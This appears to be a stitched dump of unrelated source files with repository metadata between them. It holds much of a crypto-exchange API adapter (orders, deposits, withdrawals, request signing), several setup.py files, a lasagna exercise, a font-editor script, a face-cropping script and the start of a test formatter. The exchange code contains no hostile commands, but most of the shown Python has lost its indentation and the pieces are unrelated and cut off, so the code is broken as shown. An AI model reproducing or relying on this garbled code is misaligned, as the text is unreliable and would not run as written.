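        # a minimal standalone sketch, not from the ccxt codebase, of how the
        # sample "transfer/assets" response above collapses into per-currency
        # balances; the field names come from the sample, the helper name is made up
        #
        #     def flatten_assets_sketch(response):
        #         inner = response['result'][0]['result']
        #         balances = {}
        #         for asset in inner.get('assets_list', []):
        #             balances[asset['coin_symbol']] = {
        #                 'free': asset['balance'],   # available amount
        #                 'used': asset['freeze'],    # frozen amount
        #             }
        #         return balances
        #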
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
if limit is None:
limit = 100
request = {
'page': 1,
'size': limit,
}
currency = None
if code is not None:
currency = self.currency(code)
request['symbol'] = currency['id']
response = await self.privatePostTransfer({
'cmd': 'transfer/transferInList',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":2,
# "page":1,
# "items":[
# {
# "coin_symbol":"ETH", # token
# "to_address":"xxxxxxxxxxxxxxxxxxxxxxxxxx", # address
# "amount":"1.00000000", # amount
# "confirmCount":"15", # the acknowledgment number
# "createdAt":1540641511000,
# "status":2 # status, 1-deposit is in process,2-deposit finished,3-deposit failed
# },
# {
# "coin_symbol":"BIX",
# "to_address":"xxxxxxxxxxxxxxxxxxxxxxxxxx",
# "amount":"1.00000000",
# "confirmCount":"15",
# "createdAt":1540622460000,
# "status":2
# }
# ]
# },
# "cmd":"transfer/transferInList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
deposits = self.safe_value(innerResult, 'items', [])
for i in range(0, len(deposits)):
deposits[i]['type'] = 'deposit'
return self.parse_transactions(deposits, currency, since, limit)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
if limit is None:
limit = 100
request = {
'page': 1,
'size': limit,
}
currency = None
if code is not None:
currency = self.currency(code)
request['symbol'] = currency['id']
response = await self.privatePostTransfer({
'cmd': 'transfer/transferOutList',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":612867,
# "coin_symbol":"ETH",
# "chain_type":"ETH",
# "to_address":"0xd41de7a88ab5fc59edc6669f54873576be95bff1",
# "tx_id":"0xc60950596227af3f27c3a1b5911ea1c79bae53bdce67274e48a0ce87a5ef2df8",
# "addr_remark":"binance",
# "amount":"2.34550946",
# "fee":"0.00600000",
# "createdAt":1561339330000,
# "memo":"",
# "status":3
# }
# ]
# },
# "cmd":"transfer/transferOutList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
withdrawals = self.safe_value(innerResult, 'items', [])
for i in range(0, len(withdrawals)):
withdrawals[i]['type'] = 'withdrawal'
return self.parse_transactions(withdrawals, currency, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchDeposits
#
# {
# 'id': 1023291,
# 'coin_symbol': 'ETH',
# 'to_address': '0x7263....',
# 'amount': '0.49170000',
# 'confirmCount': '16',
# 'createdAt': 1553123867000,
# 'status': 2
# }
#
# fetchWithdrawals
#
# {
# 'id': 521844,
# 'coin_symbol': 'ETH',
# 'to_address': '0xfd4e....',
# 'addr_remark': '',
# 'amount': '0.39452750',
# 'fee': '0.00600000',
# 'createdAt': 1553226906000,
# 'memo': '',
# 'status': 3
# }
#
id = self.safe_string(transaction, 'id')
address = self.safe_string(transaction, 'to_address')
currencyId = self.safe_string(transaction, 'coin_symbol')
code = self.safe_currency_code(currencyId, currency)
        timestamp = self.safe_integer(transaction, 'createdAt')
tag = self.safe_string(transaction, 'addr_remark')
type = self.safe_string(transaction, 'type')
status = self.parse_transaction_status_by_type(self.safe_string(transaction, 'status'), type)
amount = self.safe_number(transaction, 'amount')
feeCost = self.safe_number(transaction, 'fee')
if type == 'deposit':
feeCost = 0
tag = None
fee = {
'cost': feeCost,
'currency': code,
}
return {
'info': transaction,
'id': id,
'txid': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'network': None,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'type': type,
'amount': amount,
'currency': code,
'status': status,
'updated': None,
'fee': fee,
}
def parse_transaction_status_by_type(self, status, type=None):
statuses = {
'deposit': {
'1': 'pending',
'2': 'ok',
},
'withdrawal': {
'0': 'pending',
'3': 'ok',
},
}
return self.safe_string(self.safe_value(statuses, type, {}), status, status)
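        #
        # a quick illustration, not from the ccxt codebase, of how the two-level
        # map above resolves a few hypothetical raw codes(unknown codes fall
        # through unchanged)
        #
        #     parse_transaction_status_by_type('2', 'deposit')     # -> 'ok'
        #     parse_transaction_status_by_type('3', 'withdrawal')  # -> 'ok'
        #     parse_transaction_status_by_type('9', 'withdrawal')  # -> '9'
        #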
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
market = self.market(symbol)
orderType = 2 if (type == 'limit') else 1
orderSide = 1 if (side == 'buy') else 2
request = {
'cmd': 'orderpending/trade',
'body': self.extend({
'pair': market['id'],
'account_type': 0,
'order_type': orderType,
'order_side': orderSide,
'pay_bix': 0,
'amount': amount,
'price': price,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result": "100055558128036", # order id
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/trade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
id = self.safe_value(firstResult, 'result')
return {
'info': response,
'id': id,
}
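        #
        # for illustration only, not from the ccxt codebase: the request body that
        # create_order above would assemble for a hypothetical limit buy of 1 LTC
        # at 0.009 BTC(market id "LTC_BTC", order_type 2 = limit, order_side 1 = buy)
        #
        # {
        #     "cmd":"orderpending/trade",
        #     "body":{
        #         "pair":"LTC_BTC",
        #         "account_type":0,
        #         "order_type":2,
        #         "order_side":1,
        #         "pay_bix":0,
        #         "amount":1,
        #         "price":0.009
        #     }
        # }
        #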
async def cancel_order(self, id, symbol=None, params={}):
request = {
'cmd': 'orderpending/cancelTrade',
'body': self.extend({
'orders_id': id,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":"OK", # only indicates if the server received the cancelling request, and the cancelling result can be obtained from the order record
# "index": 12345, # random index, specific one in a batch
# "cmd":"orderpending/cancelTrade"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
return firstResult
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'cmd': 'orderpending/order',
'body': self.extend({
'id': str(id),
'account_type': 0, # 0 = spot account
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status, -1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# },
# "cmd":"orderpending/order"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
order = self.safe_value(firstResult, 'result')
if self.is_empty(order):
raise OrderNotFound(self.id + ' order ' + id + ' not found')
return self.parse_order(order)
def parse_order(self, order, market=None):
symbol = None
if market is None:
marketId = None
baseId = self.safe_string(order, 'coin_symbol')
quoteId = self.safe_string(order, 'currency_symbol')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
rawType = self.safe_string(order, 'order_type')
type = 'market' if (rawType == '1') else 'limit'
timestamp = self.safe_integer(order, 'createdAt')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'deal_price')
filled = self.safe_string(order, 'deal_amount')
amount = self.safe_string(order, 'amount')
cost = self.safe_string_2(order, 'deal_money', 'money')
rawSide = self.safe_string(order, 'order_side')
side = 'buy' if (rawSide == '1') else 'sell'
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
feeCost = self.safe_number(order, 'fee')
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': None,
}
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': None,
'status': status,
'fee': fee,
'trades': None,
}, market)
def parse_order_status(self, status):
statuses = {
# original comments from bibox:
'1': 'open', # pending
'2': 'open', # part completed
'3': 'closed', # completed
'4': 'canceled', # part canceled
'5': 'canceled', # canceled
'6': 'canceled', # canceling
}
return self.safe_string(statuses, status, status)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
market = None
pair = None
if symbol is not None:
market = self.market(symbol)
pair = market['id']
size = limit if limit else 200
request = {
'cmd': 'orderpending/orderPendingList',
'body': self.extend({
'pair': pair,
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': size,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":1 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# }
# ]
# },
# "cmd":"orderpending/orderPendingList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
orders = self.safe_value(innerResult, 'items', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_closed_orders(self, symbol=None, since=None, limit=200, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchClosedOrders() requires a `symbol` argument')
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'orderpending/pendingHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': limit,
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled totally, 6-to be cancelled
# }
# ]
# },
# "cmd":"orderpending/pendingHistoryList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
orders = self.safe_value(innerResult, 'items', [])
return self.parse_orders(orders, market, since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a `symbol` argument')
await self.load_markets()
market = self.market(symbol)
size = limit if limit else 200
request = {
'cmd': 'orderpending/orderHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': size,
'coin_symbol': market['baseId'],
'currency_symbol': market['quoteId'],
}, params),
}
response = await self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128033",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC",
# "currency_symbol":"BTC",
# "order_side":2,
# "order_type":2,
# "price":"0.00886500",
# "amount":"1.00000000",
# "money":"0.00886500",
# "fee":0
# }
# ]
# },
# "cmd":"orderpending/orderHistoryList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
trades = self.safe_value(innerResult, 'items', [])
return self.parse_trades(trades, market, since, limit)
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'cmd': 'transfer/transferIn',
'body': self.extend({
'coin_symbol': currency['id'],
}, params),
}
response = await self.privatePostTransfer(request)
#
# {
# "result":[
# {
# "result":"3Jx6RZ9TNMsAoy9NUzBwZf68QBppDruSKW",
# "cmd":"transfer/transferIn"
# }
# ]
# }
#
# {
# "result":[
# {
# "result":"{\"account\":\"PERSONALLY OMITTED\",\"memo\":\"PERSONALLY OMITTED\"}",
# "cmd":"transfer/transferIn"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result')
address = innerResult
tag = None
if self.is_json_encoded_object(innerResult):
parsed = json.loads(innerResult)
address = self.safe_string(parsed, 'account')
tag = self.safe_string(parsed, 'memo')
return {
'currency': code,
'address': address,
'tag': tag,
'network': None,
'info': response,
}
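        #
        # a simplified standalone sketch, not from the ccxt codebase, of how the
        # JSON-encoded "result" string in the second sample above splits into an
        # address and a memo tag; the account/memo values below are placeholders
        #
        #     import json
        #
        #     def split_address_sketch(inner_result):
        #         if inner_result.startswith('{'):  # JSON-encoded account/memo pair
        #             parsed = json.loads(inner_result)
        #             return parsed.get('account'), parsed.get('memo')
        #         return inner_result, None
        #
        #     split_address_sketch('3Jx6RZ9TNMsAoy9NUzBwZf68QBppDruSKW')
        #     # -> ('3Jx6RZ9TNMsAoy9NUzBwZf68QBppDruSKW', None)
        #     split_address_sketch('{"account":"SOMEACCOUNT","memo":"12345"}')
        #     # -> ('SOMEACCOUNT', '12345')
        #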
async def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
if self.password is None:
if not ('trade_pwd' in params):
raise ExchangeError(self.id + ' withdraw() requires self.password set on the exchange instance or a trade_pwd parameter')
if not ('totp_code' in params):
raise ExchangeError(self.id + ' withdraw() requires a totp_code parameter for 2FA authentication')
request = {
'trade_pwd': self.password,
'coin_symbol': currency['id'],
'amount': amount,
'addr': address,
}
if tag is not None:
request['address_remark'] = tag
response = await self.privatePostTransfer({
'cmd': 'transfer/transferOut',
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result": 228, # withdrawal id
# "cmd":"transfer/transferOut"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
id = self.safe_value(firstResult, 'result')
return {
'info': response,
'id': id,
}
async def fetch_funding_fees(self, codes=None, params={}):
        # by default it will try to load the withdrawal fees of all currencies(with separate requests)
        # however, if you define codes = ['ETH', 'BTC'] in the args it will only load those
await self.load_markets()
withdrawFees = {}
info = {}
if codes is None:
codes = list(self.currencies.keys())
for i in range(0, len(codes)):
code = codes[i]
currency = self.currency(code)
request = {
'cmd': 'transfer/coinConfig',
'body': self.extend({
'coin_symbol': currency['id'],
}, params),
}
response = await self.privatePostTransfer(request)
# {
# "result":[
# {
# "result":[
# {
# "coin_symbol":"ETH",
# "is_active":1,
# "original_decimals":18,
# "enable_deposit":1,
# "enable_withdraw":1,
# "withdraw_fee":0.008,
# "withdraw_min":0.05,
# "deposit_avg_spent":173700,
# "withdraw_avg_spent":322600
# }
# ],
# "cmd":"transfer/coinConfig"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result', [])
firstOuterResult = self.safe_value(outerResults, 0, {})
innerResults = self.safe_value(firstOuterResult, 'result', [])
firstInnerResult = self.safe_value(innerResults, 0, {})
info[code] = firstInnerResult
withdrawFees[code] = self.safe_number(firstInnerResult, 'withdraw_fee')
return {
'info': info,
'withdraw': withdrawFees,
'deposit': {},
}
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.implode_hostname(self.urls['api']) + '/' + self.version + '/' + path
cmds = self.json([params])
if api == 'public':
if method != 'GET':
body = {'cmds': cmds}
elif params:
url += '?' + self.urlencode(params)
elif api == 'v2private':
self.check_required_credentials()
url = self.implode_hostname(self.urls['api']) + '/v2/' + path
json_params = self.json(params)
body = {
'body': json_params,
'apikey': self.apiKey,
'sign': self.hmac(self.encode(json_params), self.encode(self.secret), hashlib.md5),
}
else:
self.check_required_credentials()
body = {
'cmds': cmds,
'apikey': self.apiKey,
'sign': self.hmac(self.encode(cmds), self.encode(self.secret), hashlib.md5),
}
if body is not None:
body = self.json(body, {'convertArraysToObjects': True})
headers = {'Content-Type': 'application/json'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
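        #
        # a standard-library sketch, not from the ccxt codebase, of the private
        # signature computed in sign() above, assuming the exchange's hmac helper
        # produces a hex digest; the secret and command payload are placeholders
        #
        #     import hashlib
        #     import hmac
        #
        #     cmds = '[{"cmd":"transfer/assets","body":{"select":1}}]'
        #     signature = hmac.new('SECRET'.encode(), cmds.encode(), hashlib.md5).hexdigest()
        #     # the POST body then carries 'cmds', 'apikey' and this 'sign' value
        #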
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
if 'error' in response:
if 'code' in response['error']:
code = self.safe_string(response['error'], 'code')
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
raise ExchangeError(self.id + ' ' + body)
if not ('result' in response):
raise ExchangeError(self.id + ' ' + body)
| 42.283933
| 453
| 0.445509
|
794e1a8780f1a93d897238f81e1731cb14bfddf5
| 283
|
py
|
Python
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 225
|
2016-03-11T06:03:41.000Z
|
2022-01-23T17:19:21.000Z
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 20
|
2016-03-26T05:42:15.000Z
|
2021-11-13T01:01:04.000Z
|
setup.py
|
edolramba/QWebview-plus
|
77e160d17af9d3ad203886198cd522f9a4796445
|
[
"MIT"
] | 90
|
2016-03-25T04:03:18.000Z
|
2022-03-02T04:21:09.000Z
|
import sys
from cx_Freeze import setup, Executable
setup( name = "QWebview-plus",
version = "1.0",
description = "QWebview supports Kiwoom Open API+ for JavaScript",
author = "sculove",
executables = [Executable("qwebviewplus.py", base="Win32GUI")])
| 35.375
| 74
| 0.657244
|
794e1ac82b35d733cd03ec2f32db1785bb11d8e2
| 1,017
|
py
|
Python
|
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
problems/exercism/guidos-gorgeous-lasagna/lasagna.py
|
JayMonari/py-personal
|
ef16d030cc7fe2266d661e1378d95f588229b746
|
[
"MIT"
] | null | null | null |
EXPECTED_BAKE_TIME = 40
def bake_time_remaining(elapsed_time: int) -> int:
'''
:param elapsed_time: int baking time already elapsed
:return: int remaining bake time derived from 'EXPECTED_BAKE_TIME'
Function that takes the actual minutes the lasagna has been in the oven as
an argument and returns how many minutes the lasagna still needs to bake
based on the `EXPECTED_BAKE_TIME`.
'''
return EXPECTED_BAKE_TIME - elapsed_time
def preparation_time_in_minutes(num_layers: int) -> int:
'''
Return total preparation time needed to complete number of layers of
lasagna.
'''
return num_layers * 2
def elapsed_time_in_minutes(num_layers: int, elapsed_time: int) -> int:
'''
Return elapsed cooking time.
This function takes two numbers representing the number of layers & the
time already spent baking and calculates the total elapsed minutes spent
cooking the lasagna.
'''
return preparation_time_in_minutes(num_layers) + elapsed_time
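# A small usage example with made-up numbers(not part of the original exercise
# solution), showing how the three helpers above combine.
if __name__ == "__main__":
    layers = 3
    minutes_in_oven = 20
    print(preparation_time_in_minutes(layers))               # 6
    print(elapsed_time_in_minutes(layers, minutes_in_oven))  # 26
    print(bake_time_remaining(minutes_in_oven))              # 20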
| 30.818182
| 78
| 0.73353
|
794e1acf56a71eeb0edbc9f99239d83b79312e4e
| 1,105
|
py
|
Python
|
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
Masters/Color/Delete Non-Color Layers in Selected Glyphs.py
|
danielgamage/Mekkablue-Scripts
|
0b0b4468ec938f8c669b3552e2fa429080b65bf1
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Delete Non-Color Layers in Selected Glyphs
# -*- coding: utf-8 -*-
__doc__="""
Deletes all sublayers in all glyphs that are not of type "Color X" (CPAL/COLR layers).
"""
import GlyphsApp
thisFont = Glyphs.font # frontmost font
thisFontMaster = thisFont.selectedFontMaster # active master
thisFontMasterID = thisFontMaster.id
listOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs
def process( thisGlyph ):
	for i in reversed(range(len(thisGlyph.layers))):
currentLayer = thisGlyph.layers[i]
if not currentLayer.layerId == thisFontMasterID: # not the master layer
if not currentLayer.name.startswith("Color "):
currentLayerID = currentLayer.layerId
thisGlyph.removeLayerForKey_(currentLayerID)
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in listOfSelectedLayers:
thisGlyph = thisLayer.parent
	print("Processing %s" % thisGlyph.name)
thisGlyph.beginUndo() # begin undo grouping
process( thisGlyph )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
| 34.53125
| 86
| 0.774661
|
794e1aeafc4c2376798dbb423c8ab391c618291c
| 2,577
|
py
|
Python
|
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
setup.py
|
converghub/qrllib
|
d14ce543094fe6fb3ebe3d303b98b4d6129a5fdd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
from distutils.sysconfig import get_python_inc
import distutils.sysconfig as sysconfig
class CMakeBuild(build_ext):
def run(self):
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
env = os.environ.copy()
env['CXXFLAGS'] = env.get('CXXFLAGS', '')
env['CXXFLAGS'] += ' -DVERSION_INFO=\\"' + self.distribution.get_version() + '\\"'
for ext in self.extensions:
extension_path = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
cmake_call = ['cmake', ext.sourcedir,
'-DBUILD_PYTHON=ON',
'-DBUILD_TESTS=OFF',
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extension_path,
'-DCMAKE_BUILD_TYPE=Release']
# Detect conda
if sys.platform == 'darwin' and 'CONDA_DEFAULT_ENV' in os.environ:
print('OSX + Conda environment detected')
python_include_dir = get_python_inc()
python_library = os.path.join(sysconfig.get_config_var('LIBDIR'), sysconfig.get_config_var('LDLIBRARY'))
cmake_call.extend(['-DPYTHON_INCLUDE_DIR=' + python_include_dir,
'-DPYTHON_LIBRARY=' + python_library])
if sys.platform == 'win32':
cmake_call.extend(['-G' + env.get('CMAKE_VS_GENERATOR', 'Ninja')])
subprocess.check_call(cmake_call, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.',
'--config', 'Release'], cwd=self.build_temp)
class CMakeExtension(Extension):
def __init__(self, name, sourcedir='', *args, **kw):
Extension.__init__(self, name, sources=[], *args, **kw)
self.sourcedir = os.path.abspath(sourcedir)
def setup_package():
needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)
sphinx = ['sphinx'] if needs_sphinx else []
cmake = []
# noinspection PyInterpreter
setup(setup_requires=['six', 'pytest-runner', 'pyscaffold>3'] + sphinx + cmake,
packages=['pyqrllib', ],
tests_require=['pytest', 'pytest-cov'],
ext_modules=[CMakeExtension('pyqrllib')],
cmdclass=dict(build_ext=CMakeBuild),
use_pyscaffold=True)
if __name__ == "__main__":
setup_package()
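# For reference(not part of the original setup.py): with the CMake-driven
# build_ext above, a local build would normally go through the standard
# setuptools/pip entry points, assuming cmake and a C++ toolchain are on PATH:
#
#     python setup.py build_ext
#     pip install .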
| 36.814286
| 120
| 0.604191
|
794e1cd6f48df42f9f86d5a0127f21465e0d0e4d
| 2,287
|
py
|
Python
|
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
test_detector.py
|
ResearchingDexter/mtcnn-pytorch
|
a7c5eb8ed2cd984a0990d59267cbac5a83770624
|
[
"MIT"
] | null | null | null |
from src.detector import detect_faces
from PIL import Image,ImageDraw
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
import tqdm
@torch.no_grad()
def img_locate(path):
img=Image.open(path)
boundboxes,landmark=detect_faces(img.copy())
print(boundboxes,landmark)
img_draw=ImageDraw.Draw(img)
print(img.size,type(landmark))
for i,box in enumerate(boundboxes):
box=np.array(box)
lm=np.array(landmark[i],np.int32)
fill=(0,0,255)
for j in range(0,len(lm)//2):
print('j:{}'.format(j))
img_draw.point((lm[j],lm[j+5]),fill=fill)
print('box:{}'.format(box))
img_draw.rectangle(tuple(box[:4].astype(np.int32)),outline=(255,0,0), width=2)
img_draw.text(tuple(box[:2].astype(np.int32)),text="{}".format(box[-1]),fill=fill)
img.show()
plt.show()
#img_draw.rectangle(label[:4], outline=(255, 0, 0), width=0)
#img_draw.text(label[:2], text=str(label[5]), fill=(255, 0, 0), font=font)
#img.show()
@torch.no_grad()
def mtcnn_crop(in_path,out_path,crop_size=(112,96)):
if not os.path.exists(out_path):
os.makedirs(out_path)
imgs_folder=os.listdir(in_path)
for img_folder in tqdm.tqdm(imgs_folder):
if not os.path.exists(os.path.join(out_path,img_folder)):
os.makedirs(os.path.join(out_path,img_folder))
img_names=os.listdir(os.path.join(in_path,img_folder))
for name in img_names:
img=Image.open(os.path.join(in_path,img_folder,name))
boundboxes, landmark = detect_faces(img)
index=0
score=boundboxes[0][-1]
for i,box in enumerate(boundboxes):
if(box[-1]>score):
index=i
score=box[-1]
box=boundboxes[index][:4].astype(np.int32)
img_crop=img.crop(box).resize(crop_size,Image.BICUBIC)
img_crop.save(os.path.join(out_path,img_folder,name))
if __name__ == '__main__':
# path=r'G:\FaceRetrieval\lfw_funneled\Jan_Peter_Balkenende'
# name='Jan_Peter_Balkenende_0001.jpg'
# img_locate(os.path.join(path,name))
in_path=r'G:\FaceRetrieval\lfw_funneled'
out_path=r'G:\FaceRetrieval\lfw_funneled_croped'
mtcnn_crop(in_path,out_path)
| 38.116667
| 90
| 0.641014
|
794e1d7938c075776f30fdc80065d384158e74f2
| 12,921
|
py
|
Python
|
behave/formatter/pretty.py
|
wombat70/behave
|
c54493b0531795d946ac6754bfc643248cf3056a
|
[
"BSD-2-Clause"
] | 13
|
2019-10-03T19:15:14.000Z
|
2019-10-16T02:01:57.000Z
|
behave/formatter/pretty.py
|
wombat70/behave
|
c54493b0531795d946ac6754bfc643248cf3056a
|
[
"BSD-2-Clause"
] | 2
|
2019-08-28T00:05:00.000Z
|
2020-03-09T19:43:25.000Z
|
behave/formatter/pretty.py
|
fluendo/behave
|
eeffde083456dcf1a0ea9b6139b32091970118c0
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf8 -*-
from __future__ import absolute_import, division
import sys
from behave.formatter.ansi_escapes import escapes, up
from behave.formatter.base import Formatter
from behave.model_core import Status
from behave.model_describe import escape_cell, escape_triple_quotes
from behave.textutil import indent, make_indentation, text as _text
import six
from six.moves import range, zip
# -----------------------------------------------------------------------------
# TERMINAL SUPPORT:
# -----------------------------------------------------------------------------
DEFAULT_WIDTH = 80
DEFAULT_HEIGHT = 24
def get_terminal_size():
    if sys.platform == "win32":
# Autodetecting the size of a Windows command window is left as an
# exercise for the reader. Prizes may be awarded for the best answer.
return (DEFAULT_WIDTH, DEFAULT_HEIGHT)
try:
import fcntl
